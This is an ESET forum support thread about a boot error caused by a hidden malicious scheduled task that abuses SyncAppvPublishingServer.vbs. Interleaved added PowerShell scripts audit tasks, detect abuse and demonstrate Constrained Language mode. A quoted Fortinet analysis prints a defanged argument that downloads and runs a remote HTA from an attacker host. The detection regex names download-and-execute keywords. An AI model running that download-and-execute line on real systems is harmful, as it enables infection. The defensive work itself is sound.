Windows Script Host issue - SyncAppvPublishingServer.vbs


Every time I boot my PC and login to Windows 10, I am given the message shown in the attached image.

Please see thread: https://www.tenforums.com/general-support/205472-windows-script-host-issue-syncappvpublishingserver-vbs.html

Was pointed to a couple of threads here which seemed to indicate I could be dealing with a hidden trojan(?)

Really hoping somebody would be able to point me in the right direction as some of the info in the threads below went over my head, and now I'm very concerned!

https://forum.eset.com/topic/32186-two-strange-powershell-processes-maybe-coinminers/page/2/
https://forum.eset.com/topic/32255-powershellagentaew-trojan-keeps-coming-back-after-cleaning-and-reboot/page/2/

 

whatisthis.PNG


Appears this might be related to: https://forum.eset.com/topic/32255-powershellagentaew-trojan-keeps-coming-back-after-cleaning-and-reboot/page/2/ .

Have you checked the Eset Detections log for any PowerShell detection log entries related to this?

In any case, a NetService\Network scheduled task is not a legit Win scheduled task.

Also, Windows is stating it can't find the C:\Windows\System32\SyncAppvPublishingServer.vbs file. If this file does exist on your Windows installation, I suspect the attacker screwed up in coding the full path correctly in the NetService\Network scheduled task actions tab, causing the Windows file-not-found alert that is appearing.

Edited by itman

  • Administrators

Scheduler executed C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" followed by a PowerShell script malware (detected as PowerShell/Agent.AEW); however, there was no such record in the Detections log, most likely because the vbs script no longer existed on the disk and could not actually run. However, I could not find any reference to the vbs file either in the registry or in the WMI repository.

The system has been up for 12 hours. If you reboot, do you still get the message that the vbs file was not found? If so, please provide a Procmon boot log (saved unfiltered and compressed).


1 hour ago, Marcos said:

Scheduler executed C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" followed by a PowerShell script malware (detected as PowerShell/Agent.AEW), however, there was no such record in the Detections log most likely because the vbs script no longer existed on the disk and could not actually run.

I believe my original theory is correct and the command-line text wscript.exe executed wasn't coded properly. I assume Eset only processes the command-line text after it has been parsed by wscript.exe. Something along the lines of this example:

Quote

I'm trying to write a script that manipulates its command line and then runs
the command line. E.g.:

myscript.vbs "C:\Full Path\Program.exe" /option"Some option" "C:\Some file"
/etc

which would then execute:

"C:\Full Path\Program.exe" /option"Some other option" "C:\Some other file"
/etc

The problem is that VBScript doesn't allow access to the full command line
like most other languages. Furthermore, the individual parameters get the
quotes stripped, so WScript.Arguments returns:

C:\Full Path\Program.exe
/optionSome other option
C:\Some file
/etc

https://groups.google.com/g/microsoft.public.scripting.vbscript/c/TyCgZkAUS5o

Edited by itman

5 hours ago, itman said:

Have you checked the Eset Dectections log for any PowerShell detection log entries related to this?

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
21/04/2023 3:25:41 PM;HTTP filter;file;https://www.tumbex.com/pgpxgopaqym.php;JS/Adware.Plugrush.B application;connection terminated;DESKTOP-8K3015I\Jack;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (F0C67FC4D1EB285A3C76A23DC38BF228BD60EC66).;A566A6BB374BF7D46BD3FF941067F26F4FAC1390;

 

5 hours ago, Marcos said:

The system has been up for 12 hours. If you reboot, do you still get the message that the vbs file was not found? If so, please provide a Procmon boot log (saved unfiltered and compressed).

I get the same message every time I boot Windows. Bootlog attached! It's a .rar for compression reasons.

Bootlog.rar


  • Administrators

Did you stop logging after you got the error about missing SyncAppvPublishingServer.vbs? Since there's no reference to wscript.exe nor SyncAppvPublishingServer.vbs in the Procmon boot log, I assume that you stopped logging before the error.


Did you check if this file, C:\Windows\System32\SyncAppvPublishingServer.vbs, exists on your Windows installation?

If it does not exist, open an admin-level command prompt window. Then enter the following:

sfc /scannow

This will scan your Windows installation and replace/repair required Windows OS files. The scan will run for a while, so let it complete its processing. After the scan completes, verify if C:\Windows\System32\SyncAppvPublishingServer.vbs now exists.


3 hours ago, itman said:

Did you check if this file, C:\Windows\System32\SyncAppvPublishingServer.vbs, exists on your Windows installation?

If it does not exist, open an admin-level command prompt window. Then enter the following:

sfc /scannow

This will scan your Windows installation and replace/repair required Windows OS files. The scan will run for a while, so let it complete its processing. After the scan completes, verify if C:\Windows\System32\SyncAppvPublishingServer.vbs now exists.

Do I want the file to (currently) exist if something is trying to use it for something other than its intended purpose?

 

11 hours ago, Marcos said:

Did you stop logging after you got the error about missing SyncAppvPublishingServer.vbs? Since there's no reference to wscript.exe nor SyncAppvPublishingServer.vbs in the Procmon boot log, I assume that you stopped logging before the error.

I stopped logging after the error popped up, although I didn't clear the error. I'll do it again.


55 minutes ago, microbill said:

Do I want the file to (currently) exist if something is trying to use it for something other than it's intended purpose?

I want you to verify that SyncAppvPublishingServer.vbs exists in the C:\Windows\System32\ directory and post back your finding.

Eset_Sync.thumb.png.87d01bd5effd27be2b6cba2d067cb2aa.png

Edited by itman

  • Administrators
1 hour ago, microbill said:

See attached bootlog. I cleared the error this time before opening Process Monitor and saving the log.

This log is ok. Please run regedit and delete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22C947D6-7388-40A7-9A2C-0195436DE3EB}, then reboot the machine.

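The two posts above (itman's point that the NetService\Network task is not a legitimate Windows task, and Marcos's instruction to delete one GUID entry under TaskCache\Tasks) describe checks a defender would want to run before touching the registry. The following is an added example, written for this page and not code from ESET, Marcos or itman. It walks every GUID under TaskCache\Tasks, cross-references it with the TaskCache\Tree entry that makes a task visible in taskschd.msc, resolves the action through the Task Scheduler API, and flags entries that are hidden or that launch wscript.exe, cscript.exe or SyncAppvPublishingServer.vbs. The Tasks and Tree key paths are real; the pattern of hosts treated as suspicious is my assumption and can be widened. The script is read-only; deleting a confirmed-malicious GUID key, as Marcos advised, stays a separate manual step.

```powershell
# Added example, not from the thread's authors. Read-only audit of the Task
# Scheduler registry cache; run from an elevated PowerShell on Windows 10.
$tasksKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks'
$treeKey  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'

# Hosts/scripts worth a second look (assumption: the ones discussed in this thread).
$suspectPattern = 'SyncAppvPublishingServer\.vbs|wscript\.exe|cscript\.exe'

$findings = foreach ($k in Get-ChildItem -Path $tasksKey) {
    $guid  = $k.PSChildName                      # e.g. {22C947D6-...}
    $props = Get-ItemProperty -Path $k.PSPath
    $path  = $props.Path                         # e.g. \Microsoft\Windows\Foo\Bar

    # Every task shown in the UI has a Tree entry whose Id equals this GUID.
    # A missing or mismatched Tree entry means the task is hidden from taskschd.msc.
    $treeId = $null
    if ($path) {
        $treeEntry = Join-Path -Path $treeKey -ChildPath $path.TrimStart('\')
        if (Test-Path -Path $treeEntry) { $treeId = (Get-ItemProperty -Path $treeEntry).Id }
    }
    $hidden = ($treeId -ne $guid)

    # Resolve the action through the Task Scheduler API when the task is visible.
    $execute = ''; $arguments = ''
    if ($path -and -not $hidden) {
        $folder = (Split-Path -Path $path -Parent).TrimEnd('\') + '\'
        $name   = Split-Path -Path $path -Leaf
        $task   = Get-ScheduledTask -TaskPath $folder -TaskName $name -ErrorAction SilentlyContinue
        if ($task) {
            $execute   = ($task.Actions | ForEach-Object { $_.Execute })   -join ' | '
            $arguments = ($task.Actions | ForEach-Object { $_.Arguments }) -join ' | '
        }
    }
    $suspect = ("$execute $arguments" -match $suspectPattern)

    [pscustomobject]@{
        Guid      = $guid
        Path      = $path
        Author    = $props.Author
        Hidden    = $hidden
        Execute   = $execute
        Arguments = $arguments
        Flag      = ($hidden -or $suspect)
    }
}

# Review flagged entries by hand before deleting anything under TaskCache\Tasks.
$findings | Where-Object { $_.Flag } | Format-List
```

A hidden entry is one where the Tasks GUID has no Tree counterpart (or the Tree Id points elsewhere), which is exactly the situation in which a task fires at boot but does not appear in the Task Scheduler console. Since the vbs file was already gone from this machine, the `Execute`/`Arguments` columns are what would have shown the wscript.exe invocation Marcos found.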

3 hours ago, itman said:

I want you to verify that SyncAppvPublishingServer.vbs exists in the C:\Windows\System32\ directory and post back your finding.

No, it does not.

 

1 hour ago, Marcos said:

This log is ok. Please run regedit and delete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22C947D6-7388-40A7-9A2C-0195436DE3EB}, then reboot the machine.

The message no longer shows up!

 

Edited by microbill

1 hour ago, microbill said:

No, it does not.

I recommend you run sfc as I posted previously: https://forum.eset.com/topic/36704-windows-script-host-issue-syncappvpublishingservervbs/?do=findComment&comment=168082 . This should restore SyncAppvPublishingServer.vbs which is a legit Win OS file.


1 hour ago, itman said:

I recommend you run sfc as I posted previously: https://forum.eset.com/topic/36704-windows-script-host-issue-syncappvpublishingservervbs/?do=findComment&comment=168082 . This should restore SyncAppvPublishingServer.vbs which is a legit Win OS file.

The file does not show in the folder.

Capture.PNG

 

Of note, my custom Windows 10 theme has now reverted from the green/yellow/red buttons in the above screenshot to the standard Windows 10 buttons.

Edited by microbill

  • Administrators

Strange, on my Win10 machine SyncAppvPublishingServer.vbs was restored after running sfc /scannow. Nevertheless, since it's not a file that you need and it's misused by malware, I'd suggest not restoring it unless you need it.


  • Administrators
4 hours ago, microbill said:

Thank you. Should I run any other tests now aside from a normal Eset scan?

You can run a 2nd opinion scan with another AV (online scanner) but it's not necessary.


11 hours ago, microbill said:

The file does not show in the folder.

Did you reboot your PC before checking if SyncAppvPublishingServer.vbs was restored? Note the output message from the SFC scan.

Edited by itman

Another recent attack abusing SyncAppvPublishingServer.vbs is:

Quote

XWorm Delivered Through Tax Scam

FortiGuard Labs became aware of a curious-looking archive file hosted on an open directory on www[.]farmaciasmv[.]com/citrix/2022%20tax_documents[.]zip, which has since been removed.

The zip file contains the following files:

  • Annual Withdrawal.xlsx (SHA2: 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0)
  • Robert tax_docs.pdf (SHA2: a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a)

The XLSX file is a benign decoy file that contains financial data from an unknown source.

The other file is malicious. Despite Robert tax_docs.pdf having a PDF icon, it is different from what it seems. The file is actually a link (LNK) file that launches the legitimate script (C:\Windows\System32\SyncAppvPublishingServer.vbs), which has a known issue of taking command line arguments. The link file exploits this issue and feeds the legitimate script with the following command line argument to download and execute a remote “note.hta”:

;\W_\*2\\\m_h_a_e ('http'+'://datacenter002[.]myftp[.]biz/documents/note.'+'hta')

The downloaded note.hta uses PowerShell to download another remote file hosted on hxxp://datacenter002[.]myftp[.]biz/documents/note[.]gif, which was not available at the time of our investigation. Finding another note.gif (SHA2: 0487ef401345aa17c6aaeac23151219863e1363f82fe76edd0066bbf3fb07715) based on the same infection chain let us continue our quest to the payload.

note.gif is a PowerShell script that creates the following files:

  • C:\Users\Public\onedrive.vbs (SHA2: 92C1767EE4A954B93D6AFA9AE83FE82B82D2867D919D0359DCF2C8DA75FB8C7C)
  • C:\Users\Public\test.vbs (SHA2: ADBA59F1495965684EEB4C5DAAD67F732FEB5E9183AE05EB869E20C88CAD7327)
  • C:\Users\Public\onedrive.ps1 (SHA2: 7A9705A424A634A321DB9F36B61D74B953A44D44EDC429F7641BF830870572FC)

Once launched, it executes the onedrive.vbs and test.vbs files.

Test.vbs creates %usertemp%\Note.txt, a clean file containing fake "QUARTERLY TAX PAYMENTS FOR 2022" data.

Onedrive.vbs runs the previously created onedrive.ps1 filled with activities designed to hamper Windows Defender.

The malware then proceeds to perform an AMSI bypass and totally trash Windows Defender protection mechanisms.

Full detailed analysis here: https://www.fortinet.com/blog/threat-research/tax-scammers-at-large

I do think it's about time Eset starts warning about command-line input on SyncAppvPublishingServer.vbs execution.

Edited by itman
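The Fortinet write-up quoted above and itman's closing remark both come down to the same detection point: SyncAppvPublishingServer.vbs passes whatever argument it is given on to PowerShell, so the thing to watch is the script being launched with argument text that looks like code. The following is an added example, not from the thread's authors, Fortinet or ESET, that implements that check over Windows Security event 4688 (process creation). It assumes process-creation auditing is enabled with the "Include command line in process creation events" policy, otherwise the CommandLine field is empty; the keyword heuristic for code-like arguments is my own assumption and should be tuned against the App-V invocations legitimately present in an environment.

```powershell
# Added example, not from the thread or Fortinet. Finds wscript/cscript launches
# of SyncAppvPublishingServer.vbs whose argument text looks like PowerShell code,
# using Security 4688 events. Requires command-line logging in 4688 to be enabled.
$script = 'SyncAppvPublishingServer.vbs'

# Heuristic (assumption): an argument that is really code rather than the
# short App-V sync parameter the script expects tends to contain these.
$codeLike = "[(')+]|http|iex|invoke|downloadstring|frombase64"

function Get-SuspiciousSyncAppvLaunch {
    param([int]$Days = 7)

    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4688
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Pull the named EventData fields out of the event XML.
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $cmd = $data['CommandLine']
        if (-not $cmd -or $cmd -notmatch [regex]::Escape($script)) { continue }

        # Everything after the script path is what the .vbs hands to PowerShell.
        $tail = ($cmd -split [regex]::Escape($script), 2)[1]
        $tail = $tail -replace '^[\s"]+', ''

        if ($tail -and $tail -match $codeLike) {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                Parent      = $data['ParentProcessName']   # explorer.exe for an LNK double-click
                NewProcess  = $data['NewProcessName']
                Arguments   = $tail
                CommandLine = $cmd
            }
        }
    }
}

Get-SuspiciousSyncAppvLaunch -Days 7 | Format-List
```

The `Parent` column is what separates the two cases seen in this thread and in the Fortinet report: a scheduled task shows svchost.exe (the Schedule service) as parent, while the tax-scam LNK shows explorer.exe. Either way, a non-empty argument string containing quotes, parentheses or a URL is not how App-V itself calls the script.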

On 6/17/2023 at 6:03 AM, itman said:

Did you reboot your PC before checking if SyncAppvPublishingServer.vbs was restored? Note the output message from the SFC scan.

I did, and have rebooted a handful of times this weekend and there is still no file. Should I be concerned? I worry that whatever this malware code was may be embedded somewhere else waiting to strike.

On 6/17/2023 at 7:56 AM, itman said:

Here's the malware attack details: https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/ . You stop crud like this by setting PowerShell to Constrained Language mode which prevents deployment of PowerShell subassemblies via .Net.

Thank you for this. To confirm, I should execute this code within Powershell?

I was going to ask if I should create a new User account on this W10 install and then deactivate the Administrator account, but upon looking, the account I use is not the "Administrator" account.

 

users.PNG

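itman's recommendation quoted in the post above is to run PowerShell in Constrained Language mode (CLM), which stops scripts from compiling and loading arbitrary .NET code. As an added example, not code from itman or the thread, the snippet below reports which language mode the current session is in and probes the capability CLM removes (`Add-Type`), then locks the running session down so the difference can be seen. Setting `LanguageMode` on a session this way is for testing only: it cannot be reversed within that session and it is not a system-wide policy; enforcing CLM for every session is done through an application control policy (WDAC or AppLocker), which is outside this snippet.

```powershell
# Added example, not from the thread. Reports the PowerShell language mode of
# the current session and whether it can still compile .NET code with Add-Type,
# the capability Constrained Language mode (CLM) takes away.
function Get-LanguageModeReport {
    $mode = $ExecutionContext.SessionState.LanguageMode
    # Unique class name per call so repeated probes in one session don't collide.
    $probeName = 'ClmProbe' + [guid]::NewGuid().ToString('N')
    $addTypeAllowed = $true
    try {
        Add-Type -TypeDefinition "public static class $probeName { public static int One() { return 1; } }" -ErrorAction Stop
    } catch {
        $addTypeAllowed = $false        # CLM refuses Add-Type and lands here
    }
    [pscustomobject]@{ LanguageMode = $mode; AddTypeAllowed = $addTypeAllowed }
}

Get-LanguageModeReport              # default install: FullLanguage / True

# Lock this one session down to observe CLM (cannot be undone in-session).
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
Get-LanguageModeReport              # ConstrainedLanguage / False
```

The second report is the state itman is describing: script functions still run, but a downloaded payload that relies on `Add-Type`, reflection or COM to assemble its next stage fails at that step.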

1 hour ago, microbill said:

To confirm, I should execute this code within Powershell?

No! It's just an illustration of one method SyncAppvPublishingServer.vbs can be abused.

As for SyncAppvPublishingServer.vbs missing from your Windows installation, I agree w/@Marcos that you should not be concerned about it. As best as I can determine, the only process that legitimately uses it is Office 2010 Access.

Edited by itman

This topic is now closed to further replies.